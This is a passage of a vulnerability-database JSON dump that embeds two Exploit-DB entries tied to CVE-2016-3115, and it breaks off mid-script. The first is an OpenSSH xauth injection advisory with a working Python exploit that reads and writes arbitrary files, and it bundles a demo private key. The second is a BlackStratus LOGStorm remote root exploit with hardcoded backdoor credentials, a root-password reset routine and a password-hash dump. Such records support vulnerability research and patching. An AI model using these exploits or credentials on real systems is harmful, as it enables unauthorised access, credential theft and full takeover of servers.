rpm:\"openssh-server~5.3p1~114.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}], "exploitdb": [{"lastseen": "2016-03-17T21:10:22", "description": "OpenSSH 7.2p1 - xauth Injection. CVE-2016-3115. Remote exploits for multiple platform", "published": "2016-03-16T00:00:00", "type": "exploitdb", "title": "OpenSSH <= 7.2p1 - xauth Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-16T00:00:00", "id": "EDB-ID:39569", "href": "https://www.exploit-db.com/exploits/39569/", "sourceData": "'''\r\nAuthor: <github.com/tintinweb>\r\nRef: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115\r\nVersion: 0.2\r\nDate: Mar 3rd, 2016\r\n\r\nTag: openssh xauth command injection may lead to forced-command and /bin/false bypass\r\n\r\nOverview\r\n--------\r\n\r\nName: openssh\r\nVendor: OpenBSD\r\nReferences: * http://www.openssh.com/[1]\r\n\r\nVersion: 7.2p1 [2]\r\nLatest Version: 7.2p1\r\nOther Versions: <= 7.2p1 (all versions; dating back ~20 years)\r\nPlatform(s): linux\r\nTechnology: c\r\n\r\nVuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\r\nOrigin: remote\r\nMin. Privs.: post auth\r\n\r\nCVE: CVE-2016-3115\r\n\r\n\r\n\r\nDescription\r\n---------\r\n\r\nquote website [1]\r\n\r\n> OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.\r\nSummary\r\n-------\r\n\r\nAn authenticated user may inject arbitrary xauth commands by sending an\r\nx11 channel request that includes a newline character in the x11 cookie.\r\nThe newline acts as a command separator to the xauth binary. This attack requires\r\nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.\r\n\r\nBy injecting xauth commands one gains limited* read/write arbitrary files,\r\ninformation leakage or xauth-connect capabilities. These capabilities can be\r\nleveraged by an authenticated restricted user - e.g. one with the login shell\r\nconfigured as /bin/false or one with configured forced-commands - to bypass\r\naccount restriction. This is generally not expected.\r\n\r\nThe injected xauth commands are performed with the effective permissions of the\r\nlogged in user as the sshd already dropped its privileges.\r\n\r\nQuick-Info:\r\n\r\n* requires: X11Forwarding yes\r\n* bypasses /bin/false and forced-commands\r\n** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)\r\n* does not bypass /bin/nologin (as there is special treatment for this)\r\n\r\nCapabilities (xauth):\r\n\r\n* Xauth\r\n\t* write file: limited chars, xauthdb format\r\n\t* read file: limit lines cut at first \\s\r\n\t* infoleak: environment\r\n\t* connect to other devices (may allow port probing)\r\n\r\n\r\nPoC see ref github.\r\nPatch see ref github.\r\n\r\n\r\nDetails\r\n-------\r\n\r\n// see annotated code below\r\n\r\n * server_input_channel_req (serverloop.c)\r\n *- session_input_channel_req:2299 (session.c [2])\r\n *- session_x11_req:2181\r\n\r\n * do_exec_pty or do_exec_no_pty\r\n *- do_child\r\n *- do_rc_files (session.c:1335 [2])\r\n\r\nUpon receiving an `x11-req` type channel request sshd parses the channel request\r\nparameters `auth_proto` and `auth_data` from the client ssh packet where\r\n`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\r\nand `auth_data` contains the actual x11 auth cookie. This information is stored\r\nin a session specific datastore. When calling `execute` on that session, sshd will\r\ncall `do_rc_files` which tries to figure out if this is an x11 call by evaluating\r\nif `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND\r\nthere is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc`\r\nis set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.\r\nNote that `auth_data` nor `auth_proto` was sanitized or validated, it just contains\r\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\r\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\r\n`xauth` commands.\r\n\r\nSidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted\r\ninput as arguments to that script.\r\nSidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]\r\n\r\nThis is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth\r\ncommand injection:\r\n\r\n\tSYNOPSIS\r\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\r\n\r\n\t\tadd displayname protocolname hexkey\r\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\r\n\t\t[n]extract filename displayname...\r\n\t\t[n]list [displayname...]\r\n\t\t[n]merge [filename...]\r\n\t\tremove displayname...\r\n\t\tsource filename\r\n\t\tinfo\r\n\t\texit\r\n\t\tquit\r\n\t\tversion\r\n\t\thelp\r\n\t\t?\r\n\t\t\r\nInteresting commands are:\r\n\t\r\n\tinfo\t - leaks environment information / path\r\n\t\t\t~# xauth info\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\tAuthority file: /root/.Xauthority\r\n\t\t\tFile new: yes\r\n\t\t\tFile locked: no\r\n\t\t\tNumber of entries: 0\r\n\t\t\tChanges honored: yes\r\n\t\t\tChanges made: no\r\n\t\t\tCurrent input: (argv):1\r\n\t\r\n\tsource\t - arbitrary file read (cut on first `\\s`)\r\n\t\t\t# xauth source /etc/shadow\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\r\n\t\t\t\t\t\t\r\n\textract - arbitrary file write\r\n\t\t\t * limited characters\r\n\t * in xauth.db format\r\n\t * since it is not compressed it can be combined with `xauth add` to\r\n\t first store data in the database and then export it to an arbitrary\r\n\t location e.g. to plant a shell or do other things.\r\n\t\r\n\tgenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit\r\n\t\t\t vulnerabilities in X.org\r\n\t\r\n\t\r\nSource\r\n------\r\n\r\nInline annotations are prefixed with `//#!`\r\n\r\n\r\n/*\r\n * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found\r\n * first in this order).\r\n */\r\nstatic void\r\ndo_rc_files(Session *s, const char *shell)\r\n{\r\n...\r\n\t\tsnprintf(cmd, sizeof cmd, \"%s -q -\",\t\t\t\t\r\n\t\t options.xauth_location);\r\n\t\tf = popen(cmd, \"w\");\t\t\t\t\t\t\t//#! run xauth -q -\r\n\t\tif (f) {\r\n\t\t\tfprintf(f, \"remove %s\\n\",\t\t\t\t\t//#! remove <user_tainted_data> - injecting \\n auth_display injects xauth command\r\n\t\t\t s->auth_display);\r\n\t\t\tfprintf(f, \"add %s %s %s\\n\",\t\t\t\t//#! \\n injection\r\n\t\t\t s->auth_display, s->auth_proto,\r\n\t\t\t s->auth_data);\r\n\t\t\tpclose(f);\r\n\t\t} else {\r\n\t\t\tfprintf(stderr, \"Could not run %s\\n\",\r\n\t\t\t cmd);\r\n\t\t}\r\n\t}\r\n}\r\n\r\nProof of Concept\r\n----------------\r\n\r\nPrerequisites:\r\n\r\n* install python 2.7.x\r\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\r\n* make sure `poc.py`\r\n\r\n\r\n Usage: <host> <port> <username> <password or path_to_privkey>\r\n\r\n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n\r\n\r\npoc:\r\n\r\n1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:\r\n\r\n#PUBKEY line - force commands: only allow \"whoami\"\r\n#cat /home/user1/.ssh/authorized_keys\r\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\r\n\r\n#cat /etc/passwd\r\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n\t\r\n2. run sshd with `X11Forwarding yes` (kali default config)\r\n\r\n#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d\r\n\r\n3. `forced-commands` - connect with user1 and display env information\r\n\r\n#> python <host> 22 user1 .demoprivkey\r\n\r\nINFO:__main__:add this line to your authorized_keys file:\r\n#PUBKEY line - force commands: only allow \"whoami\"\r\n#cat /home/user/.ssh/authorized_keys\r\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\r\n\r\nINFO:__main__:connecting to: user1:<PKEY>@host:22\r\nINFO:__main__:connected!\r\nINFO:__main__:\r\nAvailable commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n\r\n#> .info\r\nDEBUG:__main__:auth_cookie: '\\ninfo'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:Authority file: /home/user1/.Xauthority\r\nFile new: no\r\nFile locked: no\r\nNumber of entries: 1\r\nChanges honored: yes\r\nChanges made: no\r\nCurrent input: (stdin):3\r\n/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n...\r\n\t\t\r\n4. `forced-commands` - read `/etc/passwd`\r\n\r\n...\r\n#> .readfile /etc/passwd\r\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\n...\r\n\r\n5. `forced-commands` - write `/tmp/testfile`\r\n\r\n#> .writefile /tmp/testfile `thisisatestfile`\r\nDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\r\nDEBUG:__main__:dummy exec returned: None\r\nDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile 127.0.0.250:65500'\r\nDEBUG:__main__:dummy exec returned: None\r\nDEBUG:__main__:/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n\r\n#> ls -lsat /tmp/testfile\r\n4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile\r\n\r\n#> cat /tmp/testfile\r\n\\FA65500hi\\FA65500`thisisatestfile`\\AA\r\n\r\n6. `/bin/false` - connect and read `/etc/passwd`\r\n\r\n#> python <host> 22 user2 user2password\r\nINFO:__main__:connecting to: user2:user2password@host:22\r\nINFO:__main__:connected!\r\nINFO:__main__:\r\nAvailable commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n\r\n#> .readfile /etc/passwd\r\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n...\r\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n...\r\n\t\r\n7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100\r\n\r\n#> generate 8.8.8.8:100 .\t\r\n\r\n#> tcpdump\r\nIP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0\r\n\t\r\n\r\nMitigation / Workaround\r\n------------------------\r\n\r\n* disable x11-forwarding: `sshd_config` set `X11Forwarding no`\r\n* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`\r\n\r\nNotes\r\n-----\r\n\r\nVerified, resolved and released within a few days. very impressive.\r\n\r\nVendor response: see advisory [5]\r\n\r\nReferences\r\n----------\r\n\r\n[1] http://www.openssh.com/\r\n[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388\r\n[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376\r\n[4] http://linux.die.net/man/1/xauth\r\n[5] http://www.openssh.com/txt/x11fwd.adv\r\n'''\r\n\r\n#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n# Author : <github.com/tintinweb>\r\n###############################################################################\r\n#\r\n# FOR DEMONSTRATION PURPOSES ONLY!\r\n#\r\n###############################################################################\r\nimport logging\r\nimport StringIO\r\nimport sys\r\nimport os\r\n\r\nLOGGER = logging.getLogger(__name__)\r\ntry:\r\n import paramiko\r\nexcept ImportError, ie:\r\n logging.exception(ie)\r\n logging.warning(\"Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko\")\r\n sys.exit(1)\r\n\r\nclass SSHX11fwdExploit(object):\r\n def __init__(self, hostname, username, password, port=22, timeout=0.5, \r\n pkey=None, pkey_pass=None):\r\n self.ssh = paramiko.SSHClient()\r\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n if pkey:\r\n pkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass)\r\n self.ssh.connect(hostname=hostname, port=port, \r\n username=username, password=password, \r\n timeout=timeout, banner_timeout=timeout,\r\n look_for_keys=False, pkey=pkey)\r\n \r\n def exploit(self, cmd=\"xxxx\\n?\\nsource /etc/passwd\\n\"):\r\n transport = self.ssh.get_transport()\r\n session = transport.open_session()\r\n LOGGER.debug(\"auth_cookie: %s\"%repr(cmd))\r\n session.request_x11(auth_cookie=cmd)\r\n LOGGER.debug(\"dummy exec returned: %s\"%session.exec_command(\"\"))\r\n \r\n transport.accept(0.5)\r\n session.recv_exit_status() # block until exit code is ready\r\n stdout, stderr = [],[]\r\n while session.recv_ready():\r\n stdout.append(session.recv(4096))\r\n while session.recv_stderr_ready():\r\n stderr.append(session.recv_stderr(4096))\r\n session.close()\r\n return ''.join(stdout)+''.join(stderr) # catch stdout, stderr\r\n \r\n def exploit_fwd_readfile(self, path):\r\n data = self.exploit(\"xxxx\\nsource %s\\n\"%path)\r\n if \"unable to open file\" in data:\r\n raise IOError(data)\r\n ret = []\r\n for line in data.split('\\n'):\r\n st = line.split('unknown command \"',1)\r\n if len(st)==2:\r\n ret.append(st[1].strip(' \"'))\r\n return '\\n'.join(ret)\r\n \r\n def exploit_fwd_write_(self, path, data):\r\n '''\r\n adds display with protocolname containing userdata. badchars=<space>\r\n \r\n '''\r\n dummy_dispname = \"127.0.0.250:65500\"\r\n ret = self.exploit('\\nadd %s %s aa'%(dummy_dispname, data))\r\n if ret.count('bad \"add\" command line')>1:\r\n raise Exception(\"could not store data most likely due to bad chars (no spaces, quotes): %s\"%repr(data))\r\n LOGGER.debug(self.exploit('\\nextract %s %s'%(path,dummy_dispname)))\r\n return path\r\n \r\ndemo_authorized_keys = '''#PUBKEY line - force commands: only allow \"whoami\"\r\n#cat /home/user/.ssh/authorized_keys\r\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\r\n''' \r\nPRIVKEY = \"\"\"-----BEGIN RSA PRIVATE KEY-----\r\nMIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69\r\n9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn\r\nPLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN\r\nzKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts\r\nU68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh\r\nTLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH\r\nSBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W\r\ns1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O\r\naDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne\r\neuQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T\r\nA7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA\r\nrhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe\r\nDDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj\r\nbDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc\r\nKPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9\r\n2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY\r\nnimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw\r\nGt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM\r\nF0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f\r\nW3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr\r\nbjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/\r\nnY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL\r\nb4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX\r\nAo8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV\r\npryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv\r\n-----END RSA PRIVATE KEY-----\"\"\"\r\n\r\n\r\nif __name__==\"__main__\":\r\n logging.basicConfig(loglevel=logging.DEBUG)\r\n LOGGER.setLevel(logging.DEBUG)\r\n \r\n if not len(sys.argv)>4:\r\n print \"\"\" Usage: <host> <port> <username> <password or path_to_privkey>\r\n \r\n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n \r\n\"\"\"\r\n sys.exit(1)\r\n hostname, port, username, password = sys.argv[1:]\r\n port = int(port)\r\n pkey = None\r\n if os.path.isfile(password):\r\n password = None\r\n with open(password,'r') as f:\r\n pkey = f.read()\r\n elif password==\".demoprivkey\":\r\n pkey = PRIVKEY\r\n password = None\r\n LOGGER.info(\"add this line to your authorized_keys file: \\n%s\"%demo_authorized_keys)\r\n \r\n LOGGER.info(\"connecting to: %s:%s@%s:%s\"%(username,password if not pkey else \"<PKEY>\", hostname, port))\r\n ex = SSHX11fwdExploit(hostname, port=port,\r\n username=username, password=password,\r\n pkey=pkey,\r\n timeout=10\r\n )\r\n LOGGER.info(\"connected!\")\r\n LOGGER.info (\"\"\"\r\nAvailable commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n\"\"\")\r\n while True:\r\n cmd = raw_input(\"#> \").strip()\r\n if cmd.lower().startswith(\".exit\") or cmd.lower().startswith(\".quit\"):\r\n break\r\n elif cmd.lower().startswith(\".info\"):\r\n LOGGER.info(ex.exploit(\"\\ninfo\"))\r\n elif cmd.lower().startswith(\".readfile\"): \r\n LOGGER.info(ex.exploit_fwd_readfile(cmd.split(\" \",1)[1]))\r\n elif cmd.lower().startswith(\".writefile\"):\r\n parts = cmd.split(\" \")\r\n LOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:])))\r\n else:\r\n LOGGER.info(ex.exploit('\\n%s'%cmd))\r\n \r\n # just playing around \r\n #print ex.exploit_fwd_readfile(\"/etc/passwd\")\r\n #print ex.exploit(\"\\ninfo\")\r\n #print ex.exploit(\"\\ngenerate <ip>:600<port> .\") # generate <ip>:port port=port+6000\r\n #print ex.exploit(\"\\nlist\")\r\n #print ex.exploit(\"\\nnlist\")\r\n #print ex.exploit('\\nadd xx xx \"\\n')\r\n #print ex.exploit('\\ngenerate :0 . data \"')\r\n #print ex.exploit('\\n?\\n')\r\n #print ex.exploit_fwd_readfile(\"/etc/passwd\")\r\n #print ex.exploit_fwd_write_(\"/tmp/somefile\", data=\"`whoami`\")\r\n LOGGER.info(\"--quit--\")\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39569/"}, {"lastseen": "2016-12-04T21:23:14", "description": "BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Root Exploit. Remote exploit for Hardware platform", "published": "2016-12-04T00:00:00", "type": "exploitdb", "title": "BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-12-04T00:00:00", "id": "EDB-ID:40858", "href": "https://www.exploit-db.com/exploits/40858/", "sourceData": "#!/usr/bin/python\r\n# logstorm-root.py\r\n#\r\n# BlackStratus LOGStorm Remote Root Exploit\r\n#\r\n# Jeremy Brown [jbrown3264/gmail]\r\n# Dec 2016\r\n#\r\n# -Synopsis-\r\n#\r\n# \"Better Security and Compliance for Any Size Business\"\r\n#\r\n# BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among\r\n# other things, to assume complete control over the virtual appliance with root privileges. This is\r\n# possible due to multiple network servers listening for network connections by default, allowing\r\n# authorization with undocumented credentials supported by appliance's OS, web interface and sql server.\r\n#\r\n# -Tested-\r\n#\r\n# v4.5.1.35\r\n# v4.5.1.96\r\n#\r\n# -Usage-\r\n#\r\n# Dependencies: pip install paramiko MySQL-python\r\n#\r\n# There are (5) actions provided in this script: root, reset, sql, web and scan.\r\n#\r\n# [root] utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command\r\n# [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password\r\n# [sql*] utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials\r\n# [web] utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account\r\n# [scan] scans a given <host>/24 for potentially vulnerable appliances\r\n#\r\n# *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only.\r\n#\r\n# Note: this exploit is not and cannot be weaponized simply because exploits are not weapons.\r\n#\r\n# -Fixes-\r\n#\r\n# BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But\r\n# customers may (now) root the appliance themselves to change the passwords, disable root login, firewall\r\n# network services or remove additional user accounts to mitigate these vulnerabilities.. or choose another\r\n# product altogether because this appliance, as of today, simply adds too much attack surface to the network.\r\n#\r\n# -Bonuses-\r\n#\r\n# 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks\r\n# \r\n# 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files\r\n# 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running\r\n# in debug mode and probably exploitable with jdwp-shellifer.py (also netcat with -e is installed by default!)\r\n#\r\n# 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd\r\n#\r\n\r\nimport sys\r\nimport socket\r\nimport time\r\nfrom paramiko import ssh_exception\r\nimport paramiko\r\nimport MySQLdb\r\nimport httplib\r\nimport urllib\r\n\r\nSSH_BANNER = \"_/_/_/_/\"\r\nSSH_PORT = 22\r\nMYSQL_PORT = 3306\r\nMYSQL_DB = \"htr\"\r\nMYSQL_CMD = \"select USER_ID,hex(MD5_PASSWORD) from users;\"\r\nWEB_URL = \"/tvs/layout/j_security_check\"\r\n\r\nROOT_CREDS = [\"root\", \"3!acK5tratu5\"]\r\nHTINIT_CREDS = [\"htinit\", \"htinit\"]\r\nMYSQL_CREDS = [\"htr\", \"htr_pwd\"]\r\nWEB_CREDS = [\"webserviceuser\", \"donotChangeOnInstall\"]\r\n\r\n\r\ndef main():\r\n if(len(sys.argv) < 2):\r\n print(\"Usage: %s <action> <host>\" % sys.argv[0])\r\n print(\"Eg. %s root 10.1.1.3\\n\" % sys.argv[0])\r\n print(\"Actions: root reset sql web scan\")\r\n return\r\n \r\n action = str(sys.argv[1])\r\n host = str(sys.argv[2])\r\n\r\n if(\"scan\" not in action):\r\n try:\r\n socket.inet_aton(host)\r\n except socket.error:\r\n print(\"[-] %s doesn't look like a valid ip address\" % host)\r\n return\r\n\r\n ssh = paramiko.SSHClient()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n\r\n #\r\n # ssh login as root and execute 'id'\r\n #\r\n if(action == \"root\"):\r\n try:\r\n ssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT)\r\n except ssh_exception.AuthenticationException:\r\n print(\"\\n[-] Action failed, could not login with root credentials\\n\")\r\n return\r\n\r\n print(\"[+] Success!\")\r\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"id\")\r\n print(ssh_stdout.readline())\r\n\r\n return\r\n\r\n #\r\n # ssh login as htinit and reset root password to the default\r\n #\r\n elif(action == \"reset\"):\r\n print(\"[~] Resetting password on %s...\" % host)\r\n\r\n try:\r\n ssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT)\r\n except ssh_exception.AuthenticationException:\r\n print(\"\\n[-] Reset failed, could not login with htinit credentials\\n\")\r\n return\r\n\r\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"\")\r\n\r\n ssh_stdin.write(\"4\" + \"\\n\")\r\n time.sleep(2)\r\n ssh_stdin.write(ROOT_CREDS[1] + \"\\n\")\r\n time.sleep(2)\r\n ssh_stdin.write(\"^C\" + \"\\n\")\r\n time.sleep(1)\r\n\r\n print(\"[+] Appliance root password should now be reset\")\r\n\r\n return\r\n\r\n #\r\n # sql login as htr and select user/hash columns from the web users table\r\n #\r\n elif(action == \"sql\"):\r\n print(\"[~] Asking %s for it's web users and their password hashes...\" % host)\r\n\r\n try:\r\n db = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3)\r\n except MySQLdb.Error as error:\r\n print(\"\\n[-] Failed to connect to %s:\\n%s\\n\" % (host, error))\r\n return\r\n\r\n cursor = db.cursor()\r\n cursor.execute(MYSQL_CMD)\r\n\r\n data = cursor.fetchall()\r\n\r\n print(\"[+] Got creds!\\n\")\r\n\r\n for row in data:\r\n print(\"USER_ID: %s\\nMD5_PASSWORD: %s\\n\" % (row[0], row[1]))\r\n\r\n db.close()\r\n\r\n return\r\n\r\n #\r\n # http login as webserviceuser and gain presumably admin privileges\r\n #\r\n elif(action == \"web\"):\r\n print(\"[~] Attempting to login as backdoor web user at %s...\" % host)\r\n\r\n try: \r\n client = httplib.HTTPSConnection(host)\r\n except:\r\n print(\"[-] Couldn't establish SSL connection to %s\" % host)\r\n return\r\n\r\n params = urllib.urlencode({\"j_username\" : WEB_CREDS[0], \"j_password\" : WEB_CREDS[1]})\r\n headers = 